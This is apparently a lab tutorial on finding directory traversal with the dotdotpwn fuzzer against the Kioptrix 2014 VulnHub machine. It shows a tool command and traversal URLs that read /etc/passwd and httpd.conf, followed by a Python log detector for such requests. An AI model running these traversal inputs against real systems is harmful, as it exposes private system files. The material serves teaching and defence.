So you have researched your web app and found that it may be vulnerable to directory traversal attacks. Very often the path to the starting point of the directory traversal is given in the exploit guide. If it isn't, you can use the dotdotpwn script to look for a potential directory traversal.
For example:
cd /usr/share/dotdotpwn
dotdotpwn -m http-url -u http://(IPorDomainName)/examples/index.php?Action=View\&Script=/TRAVERSAL -k "root:" -o unix
-m sets the module to http-url.
-u gives the URL to be tested. The word TRAVERSAL marks the point in the URL where dotdotpwn inserts its traversal strings.
-k sets the text pattern to look for in the response, here "root:", which appears in /etc/passwd.
-o sets the operating system to unix. This information should be available from the Nmap scan of the target.
Running this will cause dotdotpwn to fuzz through a number of options to find directories that can be traversed to. For example:
http://192.168.56.102/pChart2.1.3/examples/index.php?Action=View&Script=/../usr/local/etc/apache22/httpd.conf
http://192.168.56.102/pChart2.1.3/examples/index.php?Action=View&Script=/../etc/passwd
The examples above can be found by attacking the Kioptrix 2014 vulnerable machine on VulnHub.
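On the defending side, a fuzzing run like this leaves a clear trail in the web server's access log. The following is an added example, not part of the original post or of dotdotpwn: it decodes each query parameter (including double percent-encoding) and flags requests that contain a ".." path segment. The log lines are constructed, and the function names, client addresses and status codes are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (not captured traffic). The path and the
# Script parameter come from the page; clients, timestamps and statuses are made up.
BASE = "/pChart2.1.3/examples/index.php?Action=View&Script="
SAMPLE_LOG = [
    f'192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET {BASE}/../etc/passwd HTTP/1.1" 200 1532',
    f'192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET {BASE}%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1532',
    f'192.0.2.10 - - [01/Jan/2024:10:00:02 +0000] "GET {BASE}%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 210',
    f'198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET {BASE}example.basic.php HTTP/1.1" 200 900',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# ".." as a whole path segment, with either slash style.
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_traversal(lines):
    """Return (client, parameter, decoded value, status) per suspicious parameter."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            value = fully_decode(raw)
            if TRAVERSAL_RE.search(value):
                hits.append((client, name, value, int(status)))
    return hits

def summarise(hits):
    """Per client: [attempts, attempts answered with 200], the ones to triage first."""
    summary = defaultdict(lambda: [0, 0])
    for client, _name, _value, status in hits:
        summary[client][0] += 1
        summary[client][1] += status == 200
    return dict(summary)

if __name__ == "__main__":
    print(summarise(find_traversal(SAMPLE_LOG)))
```

A 200 response to a flagged request does not prove the file was returned, so check the response size or body for those entries before concluding the traversal worked.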
For further information on dotdotpwn:
https://github.com/wireghoul/dotdotpwn
or run the following command in the terminal for the help menu:
perl dotdotpwn.pl -h